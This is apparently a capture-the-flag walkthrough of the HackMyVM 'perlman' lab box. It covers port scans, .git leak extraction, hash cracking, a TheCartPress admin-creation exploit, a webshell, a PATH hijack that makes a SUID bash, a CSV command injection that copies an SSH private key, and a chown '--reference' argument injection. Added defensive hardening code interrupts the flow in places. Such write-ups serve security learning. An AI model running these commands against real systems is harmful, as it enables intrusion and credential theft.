The target machine's IP is 192.168.56.106

Port scanning

sudo nmap --min-rate 10000 -p- 192.168.56.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 06:32 UTC
Nmap scan report for 192.168.56.106 (192.168.56.106)
Host is up (0.00029s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
995/tcp open pop3s
MAC Address: 08:00:27:18:54:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.52 seconds
sudo nmap -sT -sV -sC -O -p22,25,80,110,119,995 192.168.56.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 06:32 UTC
Nmap scan report for 192.168.56.106 (192.168.56.106)
Host is up (0.00031s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:f4:7d:ad:5d:2a:25:ec:17:b5:62:b0:2e:a5:8d:4f (RSA)
| 256 f1:d8:01:07:9f:d7:8d:2e:da:a4:9f:36:a2:ff:2a:df (ECDSA)
|_ 256 91:02:29:33:c5:ff:2d:d8:63:b8:47:f3:f3:d8:79:ac (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=perlman
| Subject Alternative Name: DNS:perlman
| Not valid before: 2022-07-02T10:12:39
|_Not valid after: 2032-06-29T10:12:39
|_smtp-commands: perlman.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
| http-git:
| 192.168.56.106:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: wp
|_http-title: Sync - Mobile App Landing Page HTML Template
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES USER SASL(PLAIN) PIPELINING AUTH-RESP-CODE STLS CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=perlman
| Subject Alternative Name: DNS:perlman
| Not valid before: 2022-07-02T10:12:39
|_Not valid after: 2032-06-29T10:12:39
119/tcp open nntp InterNetNews (INN) 2.6.4
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) PIPELINING UIDL RESP-CODES AUTH-RESP-CODE USER CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=perlman
| Subject Alternative Name: DNS:perlman
| Not valid before: 2022-07-02T10:12:39
|_Not valid after: 2032-06-29T10:12:39
MAC Address: 08:00:27:18:54:B8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Hosts: perlman.hmv, server.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds
sudo nmap --script=vuln -p22,25,80,110,119,995 192.168.56.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 06:38 UTC
Nmap scan report for 192.168.56.106 (192.168.56.106)
Host is up (0.00025s latency).

PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 2048
| Generator Length: 8
| Public Key Length: 2048
| References:
|_ https://www.ietf.org/rfc/rfc2246.txt
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
| http-git:
| 192.168.56.106:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: wp
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-internal-ip-disclosure: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /.git/HEAD: Git folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.54 (debian)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.54 (debian)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.54 (debian)'
110/tcp open pop3
119/tcp open nntp
995/tcp open pop3s
MAC Address: 08:00:27:18:54:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 32.07 seconds

There appears to be a mail service.

First add perlman.hmv to the hosts file and scan for subdomains; nothing turns up.

Information gathering

Port 80 serves a landing-page site. Directory scanning, together with the nmap results above, shows a leaked .git directory.

Run gitextract:

python2 git_extract.py http://perlman.hmv/.git/

In users.sql.572f66 we find:

'webmaster','$P$BCaMhRZQp/mi0nyIVVPS6u1EU8sTCR/'

Cracking the hash gives the credential webmaster:cookie.

But there is nowhere to log in with it, and the landing site seems to be of no use. Next, look at the NNTP service, which is a newsgroup (Usenet) service, roughly speaking.

telnet perlman.hmv 119

LIST                 list all newsgroups

GROUP perlman.hmv    select the perlman.hmv newsgroup

HEAD 2               show the headers of article ID 2
221 2 <tfi784$403$1@perlman.hmv> head
Path: server.example.net!.POSTED.192.168.0.27!not-for-mail
From: rita <rita@perlman.hmv>
Newsgroups: perlman.hmv
Subject: Whats up ?!
Date: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)
Organization: A poorly-installed InterNetNews site
Message-ID: <tfi784$403$1@perlman.hmv>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Injection-Date: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)
Injection-Info: perlman.hmv; posting-host="192.168.0.27";
logging-data="4099"; mail-complaints-to="usenet@perlman.hmv"
User-Agent: Pan/0.151 (Butcha; a6f6327)
Xref: server.example.net perlman.hmv:2

The article was posted by a user called rita.

So log in to her mailbox (POP3); the password obtained earlier works:

telnet perlman.hmv 110
Trying 192.168.56.106...
Connected to 192.168.56.106.
Escape character is '^]'.
+OK Dovecot (Debian) ready.
USER rita
+OK
PASS cookie
+OK Logged in.

But LIST shows 0 messages...

According to the walkthrough, you have to send mail as rita in order to receive a message.

nc -v perlman.hmv 25
perlman.hmv [192.168.56.106] 25 (smtp) open
220 perlman.hmv ESMTP Postfix (Debian/GNU)
EHLO perlman.hmv
250-perlman.hmv
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
VRFY rita
252 2.0.0 rita
MAIL FROM:<rita>
250 2.1.0 Ok
RCPT TO:non_existent_user0123456789@gmail.com
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Hello
.
250 2.0.0 Ok: queued as 5B8044162C
quit
221 2.0.0 Bye

In any case a message should arrive, but for some reason I never received one here. Never mind: the result is a domain, itzhak.perlman.hmv, which just needs to be added to the hosts file.

Visiting it shows a WordPress site.

Getting a shell

Scan it first:

wpscan --url=http://itzhak.perlman.hmv/ --enumerate vp,vt,tt,u

This finds a webmaster user, but the WordPress install appears modified: many files and directories are missing, and the login page looks different.

The webmaster:cookie credential does not log in either, but capturing the request shows the login is a POST to /wp-content/plugins/thecartpress/checkout/login.php

so it uses that plugin's own login feature.

wpscan --url=http://itzhak.perlman.hmv/ --enumerate ap --plugins-detection aggressive --api-token=xxx

The scan shows that this plugin does have a vulnerability that allows creating an admin account:

searchsploit thecartpress

cp /usr/share/exploitdb/exploits/php/webapps/50378.py .

python 50378.py http://itzhak.perlman.hmv/

The user created is admin_02:admin1234

After logging in, it's the usual routine of uploading a PHP webshell to get a shell.

Lateral movement

From the database we get

wp_user:||LA0666||

but it is of no use.

We can switch to the rita user with the password cookie and copy a private key for SSH access.

Uploading pspy to watch processes reveals /bin/sh -c . $HOME/.profile ; /home/milou/clean.sh

The script's contents:

#! /bin/bash

ext=(save bak bif old bck bkz sqb bak2)

for x in ${ext[@]}
do
    cd /tmp && find . -type f -user $(whoami) -name "*.$x" -exec rm {} +
done

Roughly: change to /tmp, then use find to locate files with those extensions and delete them. However, the find command here is called by a relative path.

We can create a "find" command in /tmp to hijack it:

echo "cp /usr/bin/bash /tmp/bash  && chmod +xs /tmp/bash " >find

chmod +x find

./bash -p

OK, now we are milou! Set up an SSH backdoor.

sudo -l shows we can run /home/ze_perlman/inventory as perlman.

Its content reads perl_store.csv line by line.

Change perl_store.csv to:
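The hijack above only works because clean.sh calls a bare `find` after `cd /tmp`, so the binary that runs is whatever PATH (as set up by the sourced $HOME/.profile) resolves first. The following is an added defensive check, not code from the writeup or the box: it lists the PATH entries that would let an unprivileged user supply that binary, followed by a constructed hardened version of the cleanup loop.

```shell
#!/bin/sh
# Added defensive check, not from the original writeup. risky_path_entries
# prints one line per PATH entry that lets an unprivileged user shadow a
# command looked up by bare name: an empty or relative entry (resolved
# against the current directory, /tmp in clean.sh) or a world-writable dir.
# It reads $PATH when called without an argument.
risky_path_entries() {
    _rest="${1-$PATH}:"      # trailing ':' so a trailing empty entry is seen too
    while [ -n "$_rest" ]; do
        _entry="${_rest%%:*}"
        _rest="${_rest#*:}"
        case "$_entry" in
            "")  echo "risky: empty entry (means the current directory)" ;;
            /*)  if [ -d "$_entry" ]; then
                     # -L follows symlinks such as /bin -> /usr/bin; %a is the octal mode,
                     # and a last digit of 2, 3, 6 or 7 means "others" may write.
                     case "$(stat -L -c %a "$_entry" 2>/dev/null)" in
                         *[2367]) echo "risky: world-writable $_entry" ;;
                     esac
                 fi ;;
            *)   echo "risky: relative entry '$_entry'" ;;
        esac
    done
}

# Hardened version of the cleanup loop (constructed here, not the box's script):
# pin PATH and call find by absolute path so nothing placed in /tmp can shadow it.
hardened_clean() {
    PATH=/usr/bin:/bin; export PATH
    for x in save bak bif old bck bkz sqb bak2; do
        /usr/bin/find /tmp -type f -user "$(whoami)" -name "*.$x" -exec rm -- {} +
    done
}
```

Running `risky_path_entries` as the cron user (or after sourcing its .profile) shows whether a bare `find` could be shadowed; an empty output means every entry is absolute and not writable by others.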

item,brand,price,numb
CPU,AMD,3,550,x[$(cp /home/ze_perlman/.ssh/id_rsa /tmp/key ; chmod 777 /tmp/key)]
GPU,Nvidia,4,1150
SCREEN,Samsung,4,400
MOUSE,Razer,6,20
KEYBOARD,Logitech,95,7

$(...) executes a command and substitutes its output; x[] then stores the output of $ as an element in an array. The end result is command execution. Brilliant, just brilliant~

Privilege escalation

Connect as perlman with the private key. sudo -l shows that we can again run a script, bk, with bash and any arguments:

#! /bin/bash

vfy=$(</opt/vfy.txt)

backup(){
    cp /etc/{passwd,shadow,sudoers} /opt/backup
    cp ~/.ssh/id_rsa /opt/backup
    chmod 700 /opt/backup/*
    chmod 700 /root
    chown root:root /usr/lib/news/*
    chown root:root *
    chown -R news:news /var/lib/news
    chown -R www-data:www-data /var/www
}

[[ $1 == "${vfy/un/}" ]] && backup

vfy holds the content of /opt/vfy.txt, which is undesired-root-2022.

${vfy/un/} replaces "un" in vfy with the empty string, so the argument we need to pass is "desired-root-2022".

But after running

sudo /bin/bash /opt/backup/bk desired-root-2022

none of the resulting files are accessible. Checking the walkthrough:

In /opt/backup:

touch ref
touch "./--reference=ref"

Run it again:

sudo /bin/bash /opt/backup/bk desired-root-2022

Success: we get root's private key!

I'm not entirely sure, but my guess is that this creates a checkpoint, and when the script reaches chmod 700 /opt/backup/* it gets cut off there, so the files' owner is never changed to root?
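The mechanism behind the --reference trick is argument injection through an unquoted glob: bk's `chown root:root *` is a relative glob expanded in the caller's working directory, so when the script is run from /opt/backup the list includes `--reference=ref`, which GNU chown parses as an option (`root:root` then fails as a missing file) and the remaining files, the copied id_rsa included, get ref's owner instead of root. The demonstration below is added here and is not from the writeup; it reproduces the same option parsing with chmod in a scratch directory, so it needs no root, next to the `--` form that closes the hole.

```shell
#!/bin/sh
# Added demonstration, not from the writeup: a file literally named
# "--reference=ref" turns a bare "*" glob into a chmod/chown option.
# Constructed scratch layout: secret (the file to lock down), ref (0644) and the
# planted "--reference=ref". Prints the scratch directory path.
make_scratch() {
    d=$(mktemp -d)
    touch "$d/secret" "$d/ref"
    chmod 600 "$d/secret"
    chmod 644 "$d/ref"
    touch -- "$d/--reference=ref"
    echo "$d"
}

# Weak form, as in bk: "*" puts "--reference=ref" on chmod's command line, so
# chmod takes ref's 0644 mode, treats "700" as a filename (fails) and applies
# 0644 to every other file. Prints the resulting mode of "secret".
weak_chmod() {
    d=$(make_scratch)
    ( cd "$d" && chmod 700 * 2>/dev/null ) || true   # non-zero exit: no file "700"
    stat -c %a "$d/secret"
    rm -rf "$d"
}

# Hardened form: "--" ends option parsing, so every glob result is a path
# (using ./* instead, so names start with "./", works as well).
hardened_chmod() {
    d=$(make_scratch)
    ( cd "$d" && chmod 700 -- * )
    stat -c %a "$d/secret"
    rm -rf "$d"
}
```

`weak_chmod` prints 644 and `hardened_chmod` prints 700; the same fix applies to the script's `chown root:root *`, which should also avoid depending on the caller's working directory.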

Ramblings

Quite a hard box; it took a long time. I got more familiar with mail and NNTP services. Getting the shell was fairly standard. The internal part really tests bash knowledge, and it is pretty abstract.